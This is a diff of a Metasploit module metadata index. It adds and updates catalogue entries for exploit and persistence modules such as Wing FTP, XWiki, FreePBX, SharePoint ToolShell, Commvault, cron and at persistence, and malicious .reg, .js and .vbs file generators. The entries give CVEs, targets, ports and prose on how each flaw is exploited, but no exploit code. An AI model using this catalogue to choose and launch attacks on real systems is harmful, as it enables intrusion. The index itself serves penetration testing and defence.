+    "rank": 600,
+    "disclosure_date": "2025-06-30",
+    "type": "exploit",
+    "author": [
+      "Valentin Lobstein",
+      "Julien Ahrens"
+    ],
+    "description": "Wing FTP Server allows arbitrary Lua code injection via a NULL-byte (%00) truncation bug (CVE-2025-47812).\n          Supplying <valid-user>%00<lua-payload> as the username makes the C++ authentication routine validate only the prefix,\n          while the full string is written unfiltered into the session file and later executed with root/SYSTEM privileges,\n          leading to Remote Code Execution.",
+    "references": [
+      "CVE-2025-47812",
+      "URL-https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/"
+    ],
+    "platform": "Linux,Unix,Windows",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix/Linux Command Shell",
+      "Windows Command Shell"
+    ],
+    "mod_time": "2025-07-05 22:25:45 +0000",
+    "path": "/modules/exploits/multi/http/wingftp_null_byte_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/wingftp_null_byte_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/wondercms_rce": {
    "name": "WonderCMS Remote Code Execution",
    "fullname": "exploit/multi/http/wondercms_rce",
@@ -120437,6 +122083,66 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/xwiki_unauth_rce_cve_2025_24893": {
+    "name": "Remote Code Execution Vulnerability in XWiki Platform (CVE-2025-24893)",
+    "fullname": "exploit/multi/http/xwiki_unauth_rce_cve_2025_24893",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2025-02-20",
+    "type": "exploit",
+    "author": [
+      "Maksim Rogov",
+      "John Kwak"
+    ],
+    "description": "This module exploits a template injection vulnerability in the the XWiki Platform.\n          XWiki includes a macro called SolrSearch (defined in Main.SolrSearchMacros) that enables full-text search through the embedded Solr engine.\n          The vulnerability stems from the way this macro evaluates search parameters in Groovy, failing to sanitize or restrict malicious input.\n\n          This vulnerability affects XWiki Platform versions >= 5.3-milestone-2 and < 15.10.11, and versions >= 16.0.0-rc-1 and < 16.4.1.\n          Successful exploitation may result in the remote code execution under the privileges\n          of the web server, potentially exposing sensitive data or disrupting survey operations.\n\n          An attacker can execute arbitrary system commands in the context of the user running the web server.",
+    "references": [
+      "CVE-2025-24893",
+      "URL-https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rr6p-3pfg-562j"
+    ],
+    "platform": "Linux,Unix,Windows",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Windows Command"
+    ],
+    "mod_time": "2025-08-29 08:41:43 +0000",
+    "path": "/modules/exploits/multi/http/xwiki_unauth_rce_cve_2025_24893.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/xwiki_unauth_rce_cve_2025_24893",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/zabbix_script_exec": {
    "name": "Zabbix Authenticated Remote Command Execution",
    "fullname": "exploit/multi/http/zabbix_script_exec",
@@ -121013,53 +122719,48 @@
    "needs_cleanup": true,
    "actions": []
  },
-  "exploit_multi/local/obsidian_plugin_persistence": {
-    "name": "Obsidian Plugin Persistence",
-    "fullname": "exploit/multi/local/obsidian_plugin_persistence",
+  "exploit_multi/local/periodic_script_persistence": {
+    "name": "Periodic Script Persistence",
+    "fullname": "exploit/multi/local/periodic_script_persistence",
    "aliases": [],
    "rank": 600,
-    "disclosure_date": "2022-09-16",
+    "disclosure_date": "2012-04-01",
    "type": "exploit",
    "author": [
-      "h00die",
-      "Thomas Byrne"
+      "gardnerapp",
+      "msutovsky-r7"
    ],
-    "description": "This module searches for Obsidian vaults for a user, and uploads a malicious\n          community plugin to the vault. The vaults must be opened with community\n          plugins enabled (NOT restricted mode), but the plugin will be enabled\n          automatically.\n\n          Tested against Obsidian 1.7.7 on Kali, Ubuntu 22.04, and Windows 10.",
-    "references": [
-      "URL-https://docs.obsidian.md/Plugins/Getting+started/Build+a+plugin",
-      "URL-https://github.com/obsidianmd/obsidian-sample-plugin/tree/master",
-      "URL-https://forum.obsidian.md/t/can-obsidian-plugins-have-malware/34491",
-      "URL-https://help.obsidian.md/Extending+Obsidian/Plugin+security",
-      "URL-https://thomas-byrne.co.uk/research/obsidian-malicious-plugins/obsidian-research/"
-    ],
-    "platform": "Linux,OSX,Windows",
-    "arch": "cmd",
+    "description": "This module will achieve persistence by writing a script to the /etc/periodic directory.\n          According to The Art of Mac Malware no such malware species persist in this manner (2024).\n          This payload requires root privileges to run. This module can be run on BSD, OSX or Arch Linux.",
+    "references": [],
+    "platform": "BSD,OSX,Unix",
+    "arch": "",
    "rport": null,
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": [
-      "Auto",
-      "Linux",
      "OSX",
-      "Windows"
+      "Python",
+      "Unix",
+      "Bsd"
    ],
-    "mod_time": "2024-12-14 17:38:29 +0000",
-    "path": "/modules/exploits/multi/local/obsidian_plugin_persistence.rb",
+    "mod_time": "2025-08-29 17:53:07 +0000",
+    "path": "/modules/exploits/multi/local/periodic_script_persistence.rb",
    "is_install_path": true,
-    "ref_name": "multi/local/obsidian_plugin_persistence",
+    "ref_name": "multi/local/periodic_script_persistence",
    "check": true,
    "post_auth": false,
    "default_credential": false,
    "notes": {
-      "Reliability": [
-        "repeatable-session"
-      ],
      "Stability": [
        "crash-safe"
      ],
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
      "SideEffects": [
        "artifacts-on-disk",
-        "config-changes"
+        "ioc-in-logs"
      ]
    },
    "session_types": [
@@ -123354,7 +125055,7 @@
      "Windows",
      "Unix"
    ],
-    "mod_time": "2023-04-06 15:42:39 +0000",
+    "mod_time": "2025-09-23 09:58:50 +0000",
    "path": "/modules/exploits/multi/misc/weblogic_deserialize_badattr_extcomp.rb",
    "is_install_path": true,
    "ref_name": "multi/misc/weblogic_deserialize_badattr_extcomp",
@@ -123403,7 +125104,7 @@
      "Windows",
      "Unix"
    ],
-    "mod_time": "2023-04-06 11:43:50 +0000",
+    "mod_time": "2025-09-23 09:58:50 +0000",
    "path": "/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb",
    "is_install_path": true,
    "ref_name": "multi/misc/weblogic_deserialize_badattrval",
@@ -123865,6 +125566,172 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/persistence/at": {
+    "name": "at(1) Persistence",
+    "fullname": "exploit/multi/persistence/at",
+    "aliases": [
+      "exploits/unix/local/at_persistence"
+    ],
+    "rank": 600,
+    "disclosure_date": "1997-01-01",
+    "type": "exploit",
+    "author": [
+      "Jon Hart <jon_hart@rapid7.com>"
+    ],
+    "description": "This module executes a metasploit payload utilizing at(1) to execute jobs at a specific time.  It should work out of the box\n          with any UNIX-like operating system with atd running.\n          Verified on Kali linux and OSX 13.7.4",
+    "references": [
+      "URL-https://linux.die.net/man/1/at",
+      "URL-https://www.geeksforgeeks.org/at-command-in-linux-with-examples/",
+      "ATT&CK-T1053.002",
+      "ATT&CK-T1053.001"
+    ],
+    "platform": "Linux,OSX,Unix",
+    "arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2025-09-06 15:12:16 +0000",
+    "path": "/modules/exploits/multi/persistence/at.rb",
+    "is_install_path": true,
+    "ref_name": "multi/persistence/at",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ]
+    },
+    "session_types": [
+      "meterpreter",
+      "shell"
+    ],
+    "needs_cleanup": true,
+    "actions": []
+  },
+  "exploit_multi/persistence/cron": {
+    "name": "Cron Persistence",
+    "fullname": "exploit/multi/persistence/cron",
+    "aliases": [
+      "exploits/linux/local/cron_persistence"
+    ],
+    "rank": 600,
+    "disclosure_date": "1979-07-01",
+    "type": "exploit",
+    "author": [
+      "h00die <mike@shorebreaksecurity.com>"
+    ],
+    "description": "This module will create a cron or crontab entry to execute a payload.\n          The module includes the ability to automatically clean up those entries to prevent multiple executions.\n          syslog will get a copy of the cron entry.\n          Verified on Ubuntu 22.04.1, MacOS 13.7.4",
+    "references": [
+      "ATT&CK-T1053.003"
+    ],
+    "platform": "Linux,OSX,Unix",
+    "arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Cron",
+      "User Crontab",
+      "OSX User Crontab",
+      "System Crontab"
+    ],
+    "mod_time": "2025-09-18 11:48:17 +0000",
+    "path": "/modules/exploits/multi/persistence/cron.rb",
+    "is_install_path": true,
+    "ref_name": "multi/persistence/cron",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true,
+    "actions": []
+  },
+  "exploit_multi/persistence/obsidian_plugin": {
+    "name": "Obsidian Plugin Persistence",
+    "fullname": "exploit/multi/persistence/obsidian_plugin",
+    "aliases": [
+      "exploits/multi/local/obsidian_plugin_persistence"
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-09-16",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "Thomas Byrne"
+    ],
+    "description": "This module searches for Obsidian vaults for a user, and uploads a malicious\n          community plugin to the vault. The vaults must be opened with community\n          plugins enabled (NOT restricted mode), but the plugin will be enabled\n          automatically.\n\n          Tested against Obsidian 1.7.7 on Kali, Ubuntu 22.04, and Windows 10.",
+    "references": [
+      "URL-https://docs.obsidian.md/Plugins/Getting+started/Build+a+plugin",
+      "URL-https://github.com/obsidianmd/obsidian-sample-plugin/tree/master",
+      "URL-https://forum.obsidian.md/t/can-obsidian-plugins-have-malware/34491",
+      "URL-https://help.obsidian.md/Extending+Obsidian/Plugin+security",
+      "URL-https://thomas-byrne.co.uk/research/obsidian-malicious-plugins/obsidian-research/"
+    ],
+    "platform": "Linux,OSX,Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Auto",
+      "Linux",
+      "OSX",
+      "Windows"
+    ],
+    "mod_time": "2025-09-06 15:05:21 +0000",
+    "path": "/modules/exploits/multi/persistence/obsidian_plugin.rb",
+    "is_install_path": true,
+    "ref_name": "multi/persistence/obsidian_plugin",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": null,
+    "actions": []
+  },
  "exploit_multi/php/ignition_laravel_debug_rce": {
    "name": "Unauthenticated remote code execution in Ignition",
    "fullname": "exploit/multi/php/ignition_laravel_debug_rce",
@@ -127096,6 +128963,63 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_osx/misc/remote_for_mac_udp_rce": {
+    "name": "Remote for Mac 2025.6 Unauthenticated UDP Keyboard RCE",
+    "fullname": "exploit/osx/misc/remote_for_mac_udp_rce",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2025-05-27",
+    "type": "exploit",
+    "author": [
+      "Chokri Hammedi"
+    ],
+    "description": "This module exploits an unauthenticated remote code execution vulnerability in Remote for Mac 2025.6.\n          When the \"Allow unknown devices\" setting is enabled, it is possible to simulate keyboard input via UDP packets\n          without authentication. By sending a sequence of key presses, an attacker can open the Terminal and execute\n          arbitrary shell commands, achieving code execution as the current user.",
+    "references": [
+      "PACKETSTORM-196351"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Shell"
+    ],
+    "mod_time": "2025-08-28 09:11:01 +0000",
+    "path": "/modules/exploits/osx/misc/remote_for_mac_udp_rce.rb",
+    "is_install_path": true,
+    "ref_name": "osx/misc/remote_for_mac_udp_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "screen-effects"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_osx/misc/ufo_ai": {
    "name": "UFO: Alien Invasion IRC Client Buffer Overflow",
    "fullname": "exploit/osx/misc/ufo_ai",
@@ -129068,6 +130992,66 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_unix/http/freepbx_unauth_sqli_to_rce": {
+    "name": "FreePBX ajax.php unuthenticated SQLi to RCE",
+    "fullname": "exploit/unix/http/freepbx_unauth_sqli_to_rce",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2025-08-28",
+    "type": "exploit",
+    "author": [
+      "Echo_Slow",
+      "Piotr Bazydlo",
+      "Sonny"
+    ],
+    "description": "This module exploits an unauthenticated SQL injection flaw in FreePBX prior to versions 15.0.66, 16.0.89,\n          and 17.0.3. The vulnerability lies in the /admin/ajax.php endpoint, which is accessible without\n          authentication. Additionally, the database user created by FreePBX can schedule cronjobs, allowing\n          remote code execution on the target system.",
+    "references": [
+      "CVE-2025-57819",
+      "URL-https://labs.watchtowr.com/you-already-have-our-personal-data-take-our-phone-calls-too-freepbx-cve-2025-57819/"
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command"
+    ],
+    "mod_time": "2025-09-22 17:34:00 +0000",
+    "path": "/modules/exploits/unix/http/freepbx_unauth_sqli_to_rce.rb",
+    "is_install_path": true,
+    "ref_name": "unix/http/freepbx_unauth_sqli_to_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_unix/http/laravel_token_unserialize_exec": {
    "name": "PHP Laravel Framework token Unserialize Remote Command Execution",
    "fullname": "exploit/unix/http/laravel_token_unserialize_exec",
@@ -129195,11 +131179,13 @@
    "type": "exploit",
    "author": [
      "Ege BALCI <egebalci@pm.me>",
+      "Valentin Lobstein",
      "Chris Wild"
    ],
-    "description": "Maltrail is a malicious traffic detection system, utilizing publicly\n          available blacklists containing malicious and/or generally suspicious trails.\n          The Maltrail versions < 0.54 is suffering from a command injection vulnerability.\n          The `subprocess.check_output` function in `mailtrail/core/http.py` contains\n          a command injection vulnerability in the `params.get(\"username\")` parameter.\n          An attacker can exploit this vulnerability by injecting arbitrary OS commands\n          into the username parameter. The injected commands will be executed with the\n          privileges of the running process. This vulnerability can be exploited remotely\n          without authentication.\n\n          Successfully tested against Maltrail versions 0.52 and 0.53.",
+    "description": "Maltrail is a malicious traffic detection system, utilizing publicly\n          available blacklists containing malicious and/or generally suspicious trails.\n          The Maltrail versions <= 0.54 is suffering from a command injection vulnerability.\n          The `subprocess.check_output` function in `mailtrail/core/httpd.py` contains\n          a command injection vulnerability in the `params.get(\"username\")` parameter.\n          An attacker can exploit this vulnerability by injecting arbitrary OS commands\n          into the username parameter. The injected commands will be executed with the\n          privileges of the running process. This vulnerability can be exploited remotely\n          without authentication.\n\n          Successfully tested against Maltrail versions 0.52 and 0.53.",
    "references": [
      "EDB-51676",
+      "CVE-2025-34073",
      "URL-https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/",
      "URL-https://github.com/stamparm/maltrail/issues/19146"
    ],
@@ -129225,7 +131211,7 @@
      "Unix Command",
      "Linux Dropper"
    ],
-    "mod_time": "2023-08-16 16:52:48 +0000",
+    "mod_time": "2025-07-03 14:07:14 +0000",
    "path": "/modules/exploits/unix/http/maltrail_rce.rb",
    "is_install_path": true,
    "ref_name": "unix/http/maltrail_rce",
@@ -130384,49 +132370,6 @@
    "session_types": false,
    "needs_cleanup": null
  },
-  "exploit_unix/local/at_persistence": {
-    "name": "at(1) Persistence",
-    "fullname": "exploit/unix/local/at_persistence",
-    "aliases": [],
-    "rank": 600,
-    "disclosure_date": "1997-01-01",
-    "type": "exploit",
-    "author": [
-      "Jon Hart <jon_hart@rapid7.com>"
-    ],
-    "description": "This module achieves persistence by executing payloads via at(1).",
-    "references": [],
-    "platform": "Unix",
-    "arch": "cmd",
-    "rport": null,
-    "autofilter_ports": [],
-    "autofilter_services": [],
-    "targets": [
-      "Automatic"
-    ],
-    "mod_time": "2023-02-05 15:45:30 +0000",
-    "path": "/modules/exploits/unix/local/at_persistence.rb",
-    "is_install_path": true,
-    "ref_name": "unix/local/at_persistence",
-    "check": true,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "Reliability": [
-        "repeatable-session"
-      ],
-      "Stability": [
-        "crash-safe"
-      ],
-      "SideEffects": [
-        "artifacts-on-disk",
-        "config-changes"
-      ]
-    },
-    "session_types": [],
-    "needs_cleanup": true,
-    "actions": []
-  },
  "exploit_unix/local/chkrootkit": {
    "name": "Chkrootkit Local Privilege Escalation",
    "fullname": "exploit/unix/local/chkrootkit",
@@ -163594,6 +165537,140 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/fileformat/windows_registration_entries": {
+    "name": "Malicious Windows Registration Entries (.reg) File",
+    "fullname": "exploit/windows/fileformat/windows_registration_entries",
+    "aliases": [],
+    "rank": 500,
+    "disclosure_date": "1995-08-24",
+    "type": "exploit",
+    "author": [
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module creates a Windows Registration Entries (.reg) file which\n          adds the specified payload to the Windows Registry. The payload runs\n          upon Windows login for the current user. If the user has elevated\n          privileges when opening the file, the payload will run upon login\n          when any user logs in.\n\n          The user will receive a warning prompt to confirm Registry changes\n          when opening the file.",
+    "references": [
+      "URL-https://support.microsoft.com/en-us/topic/how-to-add-modify-or-delete-registry-subkeys-and-values-by-using-a-reg-file-9c7f37cf-a5e9-e1cd-c4fa-2a26218a1a23",
+      "URL-https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys",
+      "URL-https://learn.microsoft.com/en-us/windows-hardware/drivers/install/runonce-registry-key",
+      "ATT&CK-T1204.002",
+      "ATT&CK-T1547.001"
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Microsoft Windows 2000 or newer"
+    ],
+    "mod_time": "2025-07-13 23:41:59 +0000",
+    "path": "/modules/exploits/windows/fileformat/windows_registration_entries.rb",
+    "is_install_path": true,
+    "ref_name": "windows/fileformat/windows_registration_entries",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "screen-effects"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
+  "exploit_windows/fileformat/windows_script_host_jscript": {
+    "name": "Malicious Windows Script Host JScript (.js) File",
+    "fullname": "exploit/windows/fileformat/windows_script_host_jscript",
+    "aliases": [],
+    "rank": 500,
+    "disclosure_date": "1998-06-25",
+    "type": "exploit",
+    "author": [
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module creates a Windows Script Host (WSH) JScript (.js) file.",
+    "references": [
+      "ATT&CK-T1204.002"
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Microsoft Windows 98 or newer"
+    ],
+    "mod_time": "2025-07-25 18:43:33 +0000",
+    "path": "/modules/exploits/windows/fileformat/windows_script_host_jscript.rb",
+    "is_install_path": true,
+    "ref_name": "windows/fileformat/windows_script_host_jscript",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "screen-effects"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
+  "exploit_windows/fileformat/windows_script_host_vbscript": {
+    "name": "Malicious Windows Script Host VBScript (.vbs) File",
+    "fullname": "exploit/windows/fileformat/windows_script_host_vbscript",
+    "aliases": [],
+    "rank": 500,
+    "disclosure_date": "1998-06-25",
+    "type": "exploit",
+    "author": [
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module creates a Windows Script Host (WSH) VBScript (.vbs) file.",
+    "references": [
+      "ATT&CK-T1204.002"
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Microsoft Windows 98 or newer"
+    ],
+    "mod_time": "2025-07-25 18:46:47 +0000",
+    "path": "/modules/exploits/windows/fileformat/windows_script_host_vbscript.rb",
+    "is_install_path": true,
+    "ref_name": "windows/fileformat/windows_script_host_vbscript",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "screen-effects"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/fileformat/winrar_ace": {
    "name": "RARLAB WinRAR ACE Format Input Validation Remote Code Execution",
    "fullname": "exploit/windows/fileformat/winrar_ace",
@@ -169219,6 +171296,71 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/http/commvault_rce_cve_2025_57790_cve_2025_57791": {
+    "name": "Commvault Command-Line Argument Injection to Traversal Remote Code Execution",
+    "fullname": "exploit/windows/http/commvault_rce_cve_2025_57790_cve_2025_57791",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2025-08-19",
+    "type": "exploit",
+    "author": [
+      "Sonny Macdonald",
+      "Piotr Bazydlo",
+      "remmons-r7"
+    ],
+    "description": "This module exploits an unauthenticated remote code execution exploit chain for Commvault,\n          tracked as CVE-2025-57790 and CVE-2025-57791. A command-line injection permits unauthenticated\n          access to the 'localadmin' account, which then facilitates code execution via expression\n          language injection. CVE-2025-57788 is also leveraged to leak the target host name, which is\n          necessary knowledge to exploit the remote code execution chain. This module executes in\n          the context of 'NETWORK SERVICE' on Windows.",
+    "references": [
+      "CVE-2025-57790",
+      "CVE-2025-57791",
+      "CVE-2025-57788",
+      "URL-https://documentation.commvault.com/securityadvisories/CV_2025_08_1.html",
+      "URL-https://documentation.commvault.com/securityadvisories/CV_2025_08_2.html",
+      "URL-https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability"
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Default"
+    ],
+    "mod_time": "2025-09-15 11:19:49 +0000",
+    "path": "/modules/exploits/windows/http/commvault_rce_cve_2025_57790_cve_2025_57791.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/commvault_rce_cve_2025_57790_cve_2025_57791",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk",
+        "config-changes"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_windows/http/cyclope_ess_sqli": {
    "name": "Cyclope Employee Surveillance Solution v6 SQL Injection",
    "fullname": "exploit/windows/http/cyclope_ess_sqli",
@@ -178625,6 +180767,81 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/http/sharepoint_toolpane_rce": {
+    "name": "Microsoft SharePoint Server ToolPane Unauthenticated Remote Code Execution (aka ToolShell)",
+    "fullname": "exploit/windows/http/sharepoint_toolpane_rce",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2025-07-08",
+    "type": "exploit",
+    "author": [
+      "Viettel Cyber Security",
+      "sfewer-r7"
+    ],
+    "description": "This module exploits the authentication bypass vulnerabilities CVE-2025-49706 and CVE-2025-53771, and an unsafe\n          deserialization vulnerability CVE-2025-49704, to achieve unauthenticated RCE against a vulnerable Microsoft\n          SharePoint Server. The vulnerability CVE-2025-53770 was disclosed as being a patch bypass of CVE-2025-49704,\n          and as described by the finders, CVE-2025-53770 targets a different endpoint within the /_vti_bin/ URI path.\n          As this exploit module does not target the endpoint associated with CVE-2025-53770 (per the original finders),\n          we believe this module is best described as exploiting CVE-2025-49704 and not CVE-2025-53770.",
+    "references": [
+      "CVE-2025-49704",
+      "CVE-2025-49706",
+      "CVE-2025-53770",
+      "CVE-2025-53771",
+      "URL-https://blog.viettelcybersecurity.com/sharepoint-toolshell/",
+      "URL-https://blog.leakix.net/2025/07/using-their-own-weapons-for-defense-a-sharepoint-story/",
+      "URL-https://securelist.com/toolshell-explained/",
+      "URL-https://www.zerodayinitiative.com/advisories/ZDI-25-580/",
+      "URL-https://www.zerodayinitiative.com/advisories/ZDI-25-581/",
+      "URL-https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49704",
+      "URL-https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49706",
+      "URL-https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53770",
+      "URL-https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53771",
+      "URL-https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/",
+      "URL-https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/",
+      "URL-https://gist.github.com/gboddin/6374c04f84b58cef050f5f4ecf43d501",
+      "URL-https://x.com/codewhitesec/status/1944743478350557232",
+      "URL-https://x.com/thezdi/status/1923317597673533552",
+      "URL-https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html"
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Default"
+    ],
+    "mod_time": "2025-08-06 15:33:57 +0000",
+    "path": "/modules/exploits/windows/http/sharepoint_toolpane_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/sharepoint_toolpane_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/http/sharepoint_unsafe_control": {
    "name": "Microsoft SharePoint Unsafe Control and ViewState RCE",
    "fullname": "exploit/windows/http/sharepoint_unsafe_control",
@@ -178992,6 +181209,126 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/http/sitecore_xp_cve_2025_34510": {
+    "name": "Sitecore XP CVE-2025-34510 Post-Authentication Remote Code Execution",
+    "fullname": "exploit/windows/http/sitecore_xp_cve_2025_34510",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2025-06-17",
+    "type": "exploit",
+    "author": [
+      "Piotr Bazydlo",
+      "msutovsky-r7"
+    ],
+    "description": "This module exploits CVE-2025-34510, path traversal leading to remote code execution. The module exploits also CVE-2025-34509 - hardcoded credentials of ServicesAPI account - to gain foothold.",
+    "references": [
+      "CVE-2025-34510",
+      "URL-https://labs.watchtowr.com/is-b-for-backdoor-pre-auth-rce-chain-in-sitecore-experience-platform",
